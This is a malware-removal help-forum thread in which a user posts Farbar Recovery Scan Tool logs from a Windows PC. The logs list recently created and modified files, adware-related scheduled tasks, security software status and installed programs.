S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-14 09:18 - 2014-09-14 09:22 - 00000000 ____D () C:\FRST
2014-09-14 09:08 - 2014-09-14 09:08 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-09-14 08:49 - 2014-09-14 08:49 - 00262144 _____ () C:\Windows\Minidump\Mini091414-01.dmp
2014-09-14 08:48 - 2014-09-14 08:48 - 1521674558 _____ () C:\Windows\MEMORY.DMP
2014-09-14 08:45 - 2014-09-14 08:45 - 00000000 ____D () C:\a400f61a0bb2614026ab8a56ec
2014-09-14 08:36 - 2014-06-26 16:17 - 01389200 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-09-14 08:36 - 2014-06-26 16:17 - 00619664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe
2014-09-14 08:36 - 2014-06-26 16:17 - 00171152 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00008848 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-09-14 08:35 - 2014-06-05 22:29 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-09-14 08:35 - 2014-06-05 22:28 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2014-09-14 08:10 - 2014-09-14 08:10 - 00000000 ____D () C:\ProgramData\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00001010 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-09-14 08:02 - 2014-09-14 08:19 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-14 07:56 - 2014-09-14 07:57 - 00002478 _____ () C:\Users\Hogg\Desktop\FSS.txt
2014-09-13 11:01 - 2014-06-06 02:59 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-09-13 11:01 - 2014-06-06 01:13 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-09-13 11:01 - 2014-03-10 00:26 - 01869824 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-09-13 11:01 - 2014-03-10 00:26 - 01794560 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2014-09-13 11:01 - 2014-03-09 19:22 - 01401344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2014-09-13 11:01 - 2014-03-09 19:22 - 01248768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2014-09-13 11:01 - 2013-10-29 22:34 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2014-09-13 11:01 - 2013-10-29 21:55 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2014-09-13 11:01 - 2013-10-29 20:33 - 00218112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2014-09-13 11:01 - 2013-10-22 03:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\imagehlp.dll
2014-09-13 11:01 - 2013-10-22 01:19 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imagehlp.dll
2014-09-13 11:01 - 2013-07-07 22:20 - 00172544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00992768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00133120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2014-09-13 11:01 - 2013-07-07 22:15 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 01276416 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 00174592 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 00132096 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2014-09-13 11:01 - 2013-07-03 22:21 - 00532480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.dll
2014-09-13 11:01 - 2013-07-03 22:13 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2014-09-13 11:01 - 2013-06-28 20:25 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00259584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00007552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00785624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Wdf01000.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00054376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfLdr.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\Wdfres.dll
2014-09-13 11:01 - 2013-03-07 22:18 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2014-09-13 11:01 - 2013-03-07 22:17 - 02425344 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-09-13 11:01 - 2013-03-07 21:52 - 02067968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-09-13 11:01 - 2012-11-21 22:22 - 00456192 _____ (Microsoft Corporation) C:\Windows\system32\shlwapi.dll
2014-09-13 11:01 - 2012-11-21 21:54 - 00353280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shlwapi.dll
2014-09-13 11:01 - 2012-11-07 22:26 - 01570816 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-09-13 11:01 - 2012-11-07 21:48 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-09-13 11:01 - 2011-05-05 08:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2014-09-13 11:01 - 2011-05-05 08:17 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2014-09-13 11:00 - 2014-06-02 15:30 - 03137536 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-09-13 11:00 - 2014-06-02 15:30 - 00503296 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-09-13 11:00 - 2014-06-02 15:29 - 02280448 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-09-13 11:00 - 2014-06-02 15:29 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2014-09-13 11:00 - 2014-06-02 14:29 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-09-13 11:00 - 2014-06-02 04:31 - 02263552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-09-13 11:00 - 2014-06-02 04:31 - 00332800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2014-09-13 11:00 - 2014-06-02 04:30 - 01993728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2014-09-13 11:00 - 2014-05-30 01:10 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-09-13 11:00 - 2013-05-01 22:16 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2014-09-13 11:00 - 2013-05-01 22:04 - 00443904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2014-09-13 11:00 - 2013-05-01 22:03 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\printcom.dll
2014-09-13 11:00 - 2012-11-02 04:45 - 00477696 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2014-09-13 11:00 - 2012-11-02 04:45 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll
2014-09-13 11:00 - 2012-11-02 04:18 - 00376320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2014-09-13 11:00 - 2012-11-02 02:59 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2014-09-13 11:00 - 2012-11-02 02:26 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
2014-09-13 10:33 - 2014-09-14 09:22 - 01754820 _____ () C:\Windows\WindowsUpdate.log
2014-09-13 09:00 - 2014-09-13 09:16 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-09-13 08:54 - 2014-09-13 08:54 - 00000010 _____ () C:\0.bak
2014-09-13 08:43 - 2014-09-14 08:57 - 00000492 _____ () C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job
2014-09-13 08:43 - 2014-09-13 09:02 - 00000440 _____ () C:\Windows\Tasks\ParetoLogic Update Version3.job
2014-09-13 08:43 - 2014-09-13 08:43 - 00003252 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3
2014-09-13 08:43 - 2014-09-13 08:43 - 00002916 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3 Startup Task
2014-09-13 08:02 - 2014-09-13 08:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-13 08:00 - 2014-09-13 09:03 - 00003358 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-13 08:00 - 2014-09-13 09:03 - 00003222 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-12 19:57 - 2014-09-14 08:48 - 00454656 _____ () C:\Windows\PFRO.log
2014-09-11 19:45 - 2014-09-14 08:01 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-11 19:45 - 2014-09-13 10:33 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2014-09-11 19:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-11 19:45 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-10 09:12 - 2014-09-10 09:12 - 00001696 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iPod
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-10 09:07 - 2014-09-10 09:08 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{13306464-7F21-4CB3-8898-656F1737CBDE}
2014-09-10 09:07 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{A3C935CF-1510-4F00-9E9C-EF2EEF690822}
2014-09-07 18:53 - 2014-09-07 18:53 - 00131091 _____ () C:\Users\Hogg\Documents\French Powerpoint.pptx
2014-09-01 09:03 - 2014-09-01 09:03 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{1FCB82CA-3656-4F6D-9E00-833069C741DC}
2014-09-01 09:02 - 2014-09-01 09:02 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{5A7A28E0-64E5-4538-BCD1-3606DF5D5886}
2014-08-29 10:04 - 2014-08-29 10:05 - 00000000 ___HD () C:\ProgramData\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-16 10:09 - 2014-09-08 20:24 - 00000000 ____D () C:\Users\Hogg\AppData\Local\Adobe
2014-08-15 18:08 - 2014-08-15 18:09 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{7D129394-6E34-406F-921E-B97DDE291BE4}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-14 09:22 - 2014-09-14 09:18 - 00000000 ____D () C:\FRST
2014-09-14 09:22 - 2014-09-13 10:33 - 01754820 _____ () C:\Windows\WindowsUpdate.log
2014-09-14 09:12 - 2013-10-04 09:35 - 00759982 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-09-14 09:12 - 2006-11-02 06:46 - 00784954 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-14 09:08 - 2014-09-14 09:08 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-09-14 09:05 - 2013-03-16 09:14 - 00000000 ____D () C:\Users\Hogg\AppData\Local\CrashDumps
2014-09-14 08:57 - 2014-09-13 08:43 - 00000492 _____ () C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job
2014-09-14 08:57 - 2009-08-13 11:38 - 00003986 _____ () C:\Windows\System32\Tasks\Google Software Updater
2014-09-14 08:57 - 2009-08-13 11:38 - 00000880 _____ () C:\Windows\Tasks\Google Software Updater.job
2014-09-14 08:56 - 2009-08-13 11:50 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-14 08:55 - 2006-11-02 09:42 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-14 08:55 - 2006-11-02 09:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-14 08:55 - 2006-11-02 09:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-14 08:52 - 2006-11-02 09:42 - 00032598 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-14 08:49 - 2014-09-14 08:49 - 00262144 _____ () C:\Windows\Minidump\Mini091414-01.dmp
2014-09-14 08:49 - 2009-08-17 20:32 - 00000000 ____D () C:\Windows\Minidump
2014-09-14 08:49 - 2009-08-06 10:03 - 00000000 ____D () C:\Windows\SysWOW64\RTCOM
2014-09-14 08:48 - 2014-09-14 08:48 - 1521674558 _____ () C:\Windows\MEMORY.DMP
2014-09-14 08:48 - 2014-09-12 19:57 - 00454656 _____ () C:\Windows\PFRO.log
2014-09-14 08:48 - 2014-04-14 13:35 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-09-14 08:45 - 2014-09-14 08:45 - 00000000 ____D () C:\a400f61a0bb2614026ab8a56ec
2014-09-14 08:30 - 2012-12-14 10:04 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-14 08:21 - 2014-04-14 13:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-09-14 08:19 - 2014-09-14 08:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-14 08:10 - 2014-09-14 08:10 - 00000000 ____D () C:\ProgramData\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00001010 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-09-14 08:02 - 2009-08-07 09:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-14 08:01 - 2014-09-11 19:45 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 07:57 - 2014-09-14 07:56 - 00002478 _____ () C:\Users\Hogg\Desktop\FSS.txt
2014-09-14 07:46 - 2009-08-13 11:50 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-14 07:46 - 2006-11-02 06:34 - 00000285 _____ () C:\Windows\win.ini
2014-09-14 07:42 - 2013-06-28 15:16 - 00000000 ____D () C:\Program Files (x86)\ParetoLogic
2014-09-14 07:40 - 2012-05-23 20:30 - 00000924 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA.job
2014-09-13 18:00 - 2013-06-30 07:53 - 00000494 _____ () C:\Windows\Tasks\Foresight Software Registration3.job
2014-09-13 18:00 - 2013-06-28 15:16 - 00000466 _____ () C:\Windows\Tasks\ParetoLogic Registration3.job
2014-09-13 16:40 - 2012-05-23 20:30 - 00000902 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core.job
2014-09-13 10:33 - 2014-09-11 19:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-13 09:23 - 2011-04-13 05:34 - 00000000 ____D () C:\Users\Hogg\Desktop\Aviation
2014-09-13 09:22 - 2009-10-18 20:33 - 00000000 ____D () C:\Users\Hogg\Desktop\Fitness
2014-09-13 09:16 - 2014-09-13 09:00 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-09-13 09:03 - 2014-09-13 08:00 - 00003358 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-13 09:03 - 2014-09-13 08:00 - 00003222 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-13 09:02 - 2014-09-13 08:43 - 00000440 _____ () C:\Windows\Tasks\ParetoLogic Update Version3.job
2014-09-13 09:01 - 2014-03-05 19:29 - 00000000 ____D () C:\Program Files (x86)\QuickTime
2014-09-13 09:01 - 2013-11-22 09:58 - 00000000 ____D () C:\Program Files (x86)\PasswordBox
2014-09-13 08:54 - 2014-09-13 08:54 - 00000010 _____ () C:\0.bak
2014-09-13 08:43 - 2014-09-13 08:43 - 00003252 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3
2014-09-13 08:43 - 2014-09-13 08:43 - 00002916 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3 Startup Task
2014-09-13 08:43 - 2013-06-28 15:16 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\ParetoLogic
2014-09-13 08:43 - 2013-06-28 15:16 - 00000000 ____D () C:\ProgramData\ParetoLogic
2014-09-13 08:02 - 2014-09-13 08:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-13 07:57 - 2006-11-02 09:21 - 00412128 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-12 21:08 - 2009-08-06 10:20 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-09-12 21:04 - 2009-08-07 11:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Games
2014-09-12 20:31 - 2012-05-31 09:19 - 00000000 ____D () C:\Users\Hogg\Desktop\Dad Stuff
2014-09-12 20:26 - 2009-08-07 09:25 - 00112704 _____ () C:\Users\Hogg\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-12 20:18 - 2013-01-18 22:30 - 00000000 ____D () C:\FlightTest5
2014-09-12 20:12 - 2013-06-17 12:09 - 00000483 _____ () C:\0
2014-09-12 20:08 - 2012-10-08 19:59 - 00000000 ____D () C:\Users\Hogg\Desktop\Court Stuff
2014-09-12 19:43 - 2009-10-05 20:32 - 00000000 ____D () C:\Users\Hogg\AppData\Local\PowerCinema
2014-09-12 19:40 - 2009-08-06 10:45 - 00000000 ____D () C:\Program Files (x86)\SMINST
2014-09-12 19:39 - 2014-08-13 08:50 - 00000000 ____D () C:\Users\Guest\AppData\Local\iLivid
2014-09-12 19:39 - 2013-08-19 09:43 - 00000000 ____D () C:\Program Files (x86)\AVG SafeGuard toolbar
2014-09-12 16:46 - 2006-11-02 09:07 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-09-12 12:03 - 2010-01-15 11:32 - 00000000 ____D () C:\Windows\Hewlett-Packard
2014-09-12 12:01 - 2012-11-27 23:12 - 00000000 ____D () C:\Program Files (x86)\Red Sky
2014-09-12 08:08 - 2012-12-14 10:04 - 00003682 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-12 08:08 - 2012-04-01 10:36 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-12 08:08 - 2012-02-05 12:03 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-11 19:45 - 2014-09-11 19:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2012-07-31 08:59 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\Malwarebytes
2014-09-11 19:45 - 2012-07-31 08:58 - 00000943 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-11 19:45 - 2012-07-31 08:58 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-11 19:45 - 2012-07-31 08:58 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-11 09:57 - 2012-05-24 19:58 - 00000404 ____H () C:\Windows\Tasks\Norton Security Scan for Hogg.job
2014-09-11 07:37 - 2009-08-06 10:44 - 00000000 ____D () C:\ProgramData\Norton
2014-09-10 09:12 - 2014-09-10 09:12 - 00001696 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iPod
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-10 09:08 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{13306464-7F21-4CB3-8898-656F1737CBDE}
2014-09-10 09:08 - 2009-08-07 09:19 - 00000000 ____D () C:\Users\Hogg
2014-09-10 09:07 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{A3C935CF-1510-4F00-9E9C-EF2EEF690822}
2014-09-09 16:14 - 2012-05-24 19:58 - 00003558 _____ () C:\Windows\System32\Tasks\Norton Security Scan for Hogg
2014-09-08 20:24 - 2014-08-16 10:09 - 00000000 ____D () C:\Users\Hogg\AppData\Local\Adobe
2014-09-07 18:53 - 2014-09-07 18:53 - 00131091 _____ () C:\Users\Hogg\Documents\French Powerpoint.pptx
2014-09-01 09:03 - 2014-09-01 09:03 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{1FCB82CA-3656-4F6D-9E00-833069C741DC}
2014-09-01 09:02 - 2014-09-01 09:02 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{5A7A28E0-64E5-4538-BCD1-3606DF5D5886}
2014-08-31 10:00 - 2009-08-07 09:43 - 00000552 _____ () C:\Windows\Tasks\PCDRScheduledMaintenance.job
2014-08-29 13:01 - 2006-11-02 06:35 - 101694776 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-08-29 10:05 - 2014-08-29 10:04 - 00000000 ___HD () C:\ProgramData\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-29 01:48 - 2013-06-30 07:49 - 00000440 _____ () C:\Windows\Tasks\PC Helper 360.job
2014-08-25 20:17 - 2013-08-19 09:43 - 00000000 ____D () C:\Users\Hogg\AppData\Local\AVG SafeGuard toolbar
2014-08-25 06:53 - 2009-10-07 07:01 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-08-18 12:55 - 2010-03-28 20:39 - 00000000 ____D () C:\Users\Hogg\Desktop\Football Stuff
2014-08-15 18:09 - 2014-08-15 18:08 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{7D129394-6E34-406F-921E-B97DDE291BE4}

Files to move or delete:
====================
C:\ProgramData\7z6ge.pad
C:\ProgramData\ism_0_llatsni.pad
C:\ProgramData\ras_0oed.pad
C:\ProgramData\uninstaller.exe
C:\ProgramData\unrar.exe

Some content of TEMP:
====================
C:\Users\Hogg\AppData\Local\Temp\Update.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-09-14 08:59

==================== End Of Log ============================



#2 mleehogg

Posted 14 September 2014 - 10:31 AM

Here are the addition logs:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-09-2014
Ran by Hogg at 2014-09-14 09:22:25
Running from C:\Users\Hogg\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FOT92IOD
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Internet Security (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Internet Security (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: IObit Malware Fighter (Disabled - Up to date) {A751AC20-3B48-5237-898A-78C4436BB78D}
FW: Norton Internet Security (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 Update for Microsoft Office 2007 (KB2508958) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
64 Bit HP CIO Components Installer (Version: 3.2.1 - Hewlett-Packard) Hidden
6500_E709_eDocs (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
ActiveCheck component for HP Active Support Library (x32 Version: 3.0.0.2 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.1.0.4880 - Adobe Systems Incorporated) Hidden
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Photoshop Elements 7.0 (HKLM-x32\...\Adobe Photoshop Elements 7) (Version: 7.0.1 - Adobe Systems Incorporated)
Adobe Photoshop Elements 7.0 (x32 Version: 7.0.1 - Adobe Systems Incorporated) Hidden
Adobe Photoshop Elements 7.0 (x32 Version: 7.0.1.3 - Adobe Systems Incorporated) Hidden
Adobe Premiere Elements 7.0 (HKLM-x32\...\PremElem70) (Version: 7.0.1 - Adobe Systems Incorporated)
Adobe Premiere Elements 7.0 (x32 Version: 7.0.1.3 - Adobe Systems Incorporated) Hidden
